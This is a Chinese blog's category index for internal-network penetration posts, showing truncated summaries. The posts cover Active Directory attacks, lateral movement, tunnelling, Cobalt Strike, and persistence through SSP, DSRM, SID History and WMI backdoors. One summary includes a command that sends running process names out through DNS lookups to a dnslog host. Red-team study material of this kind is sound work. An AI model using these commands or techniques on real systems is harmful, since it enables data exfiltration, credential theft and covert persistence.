随笔分类 -  内网渗透

摘要:https://blog.csdn.net/qq_41631806/article/details/118251231 阅读全文
posted @ 2022-07-19 14:50 micr067 阅读(96) 评论(0) 推荐(0) 编辑
摘要:FOFA搜索: microsoft exchange 2013: app="Microsoft-Exchange-2013"||app="Microsoft-Exchange-Server-2013-CU21"||app="Microsoft-Exchange-Server-2013-CU17"|| 阅读全文
posted @ 2022-04-27 10:09 micr067 阅读(351) 评论(0) 推荐(0) 编辑
该文被密码保护。
posted @ 2022-03-23 19:52 micr067 阅读(1) 评论(0) 推荐(0) 编辑
摘要:1、for循环实现 for /F %i in ('wmic process get Name ^| findstr ".exe"') do ping -n 1 %i.******.dnslog.cn >nul 2、利用powershell foreach循环实现 powershell -c "Get 阅读全文
posted @ 2021-10-02 17:58 micr067 阅读(216) 评论(0) 推荐(0) 编辑
摘要:1、简介 SCShell是无文件横向移动工具,它依赖ChangeServiceConfigA来运行命令。该工具的优点在于它不会针对SMB执行身份验证。一切都通过DCERPC执行。无需创建服务,而只需通过ChangeServiceConfigAAPI 远程打开服务并修改二进制路径名即可(所以要事先知道 阅读全文
posted @ 2020-12-12 20:21 micr067 阅读(751) 评论(0) 推荐(0) 编辑
摘要:LDAP(Light Directory Access Protocal)是一个基于X.500标准的轻量级目录访问协议,LDAP是支持跨平台的Internet协议,只需要通过LDAP做简单的配置就可以与服务器做认证交互。可以大大降低开发的成本。 windows Active Diretcory就是一 阅读全文
posted @ 2020-11-21 13:51 micr067 阅读(1655) 评论(0) 推荐(0) 编辑
摘要:本文包含从 Internet 的各个角落收集的 PowerShell 命令列表,这些命令在渗透测试或红色团队练习期间可能会有所帮助。 该列表包括各种开发后的单行在纯 PowerShell 不需要任何攻击 (= 可能标记为恶意) 第三方模块, 但也一堆方便的管理命令. 查找包含敏感信息的文件 在开发后 阅读全文
posted @ 2020-11-14 16:50 micr067 阅读(914) 评论(0) 推荐(0) 编辑
摘要:一、实验拓扑: 实验目标:通过attacker机器直接访问到内网B区域机器 二、实验测试 1、vps上开启frp服务端服务 注意:建议使用vps地址使用短域名,这样方便后期更换服务器时,不用再去更改配置。 [common] #frp服务端监听 [VPS] bind_addr = 0.0.0.0 #f 阅读全文
posted @ 2020-09-07 21:16 micr067 阅读(928) 评论(0) 推荐(0) 编辑
该文被密码保护。
posted @ 2020-08-15 08:10 micr067 阅读(0) 评论(0) 推荐(0) 编辑
摘要:一、简述 CrossC2插件是为企业和红队人员提供的安全框架,支持 CobaltStrike 对其他平台的渗透测试(Linux / MacOS /...),支持自定义模块,并包括一些常用的渗透模块。 利用CrossC2插件通过在Linux上执行木马反弹一个CobaltStrike类型的shell。 阅读全文
posted @ 2020-07-15 23:45 micr067 阅读(6124) 评论(0) 推荐(0) 编辑
摘要:活动目录使用备忘单 包含 Windows 活动目录的常见枚举和攻击方法的备忘单。 工具 Powersploit PowerUpSQL Powermad Impacket Mimikatz Rubeus - >编译版本 BloodHound AD Module ASREPRoast 枚举 使用 Pow 阅读全文
posted @ 2020-07-11 15:50 micr067 阅读(309) 评论(0) 推荐(0) 编辑
摘要:一、执行java代码 简介 oracle提权漏洞集中存在于PL/SQL编写的函数、存储过程、包、触发器中。oracle存在提权漏洞的一个重要原因是PL/SQL定义的两种调用权限导致(定义者权限和调用者权限)。定义者权限给了低权限用户在特定时期拥有高权限的可能,这就给提权操作奠定了基础。 即无论调用者 阅读全文
posted @ 2020-04-23 20:29 micr067 阅读(3055) 评论(0) 推荐(1) 编辑
摘要:一、简介 每个用户都有自己的SID,SID的作用主要是跟踪安全主体控制用户连接资源时的访问权限,SID History是在域迁移过程中需要使用的一个属性。 如果A域中的域用户迁移到B域中,那么该用户的SID值就会改变,进而其权限也会改变。导致迁移后的用户无法访问以前可以访问的资源。SID Histo 阅读全文
posted @ 2020-02-19 15:51 micr067 阅读(465) 评论(0) 推荐(0) 编辑
摘要:一、简介 SSP(Security Support Provider)是windows操作系统安全机制的提供者。简单的说,SSP就是DLL文件,主要用于windows操作系统的身份认证功能,例如NTLM、Kerberos、Negotiate、Secure Channel(Schannel)、Dige 阅读全文
posted @ 2020-02-19 15:43 micr067 阅读(639) 评论(0) 推荐(0) 编辑
摘要:一、DSRM简介 1.DSRM(Diretcory Service Restore Mode,目录服务恢复模式)是windows域环境中域控制器的安全模式启动选项。域控制器的本地管理员账户也就是DSRM账户,DSRM密码是在DC创建时设置的,一般很少更改。DSRM的用途是:允许管理员在域环境出现故障 阅读全文
posted @ 2020-02-19 12:11 micr067 阅读(1246) 评论(0) 推荐(1) 编辑
摘要:WMI型后门只能由具有管理员权限的用户运行。WMI后门通常使用powershell编写的,可以直接从新的WMI属性中读取和执行后门代码,给代码加密。通过这种方式攻击者会在系统中安装一个持久性的后门,且不会在磁盘中留下任何文件。 WMI型后门主要有两个特征:无文件和无进程。其基本原理是:将代码加密存储 阅读全文
posted @ 2020-02-17 19:48 micr067 阅读(928) 评论(0) 推荐(0) 编辑
摘要:1.下载NTDSX http://www.ntdsxtract.com git clone https://github.com/csababarta/ntdsxtract 安装 python setup.py build && python setup.py install 将导出的ntds.di 阅读全文
posted @ 2020-02-15 10:02 micr067 阅读(921) 评论(0) 推荐(0) 编辑
摘要:一、简介 通常情况下,即使拥有管理员权限,也无法读取域控制器中的C:\Windows\NTDS\ntds.dit文件。使用windows本地卷影拷贝服务,就可以获得该文件的副本。 在活动目录中,所有的数据都保存在ntds.dit中。ntds.dit是一个二进制文件,存储位置为域控制器的%System 阅读全文
posted @ 2020-02-15 09:58 micr067 阅读(788) 评论(0) 推荐(0) 编辑
摘要:Exchange是由微软推出的用于企业环境中部署的邮件服务器。Exchange在逻辑上分为三个层次:网络层(network layer)、目录层(directory layer)、消息层(messaging layer),服务器角色正是在消息层上的一个细分。Exchange Server 2010包 阅读全文
posted @ 2020-02-14 15:09 micr067 阅读(1317) 评论(0) 推荐(0) 编辑
该文被密码保护。
posted @ 2020-02-13 09:27 micr067 阅读(0) 评论(0) 推荐(0) 编辑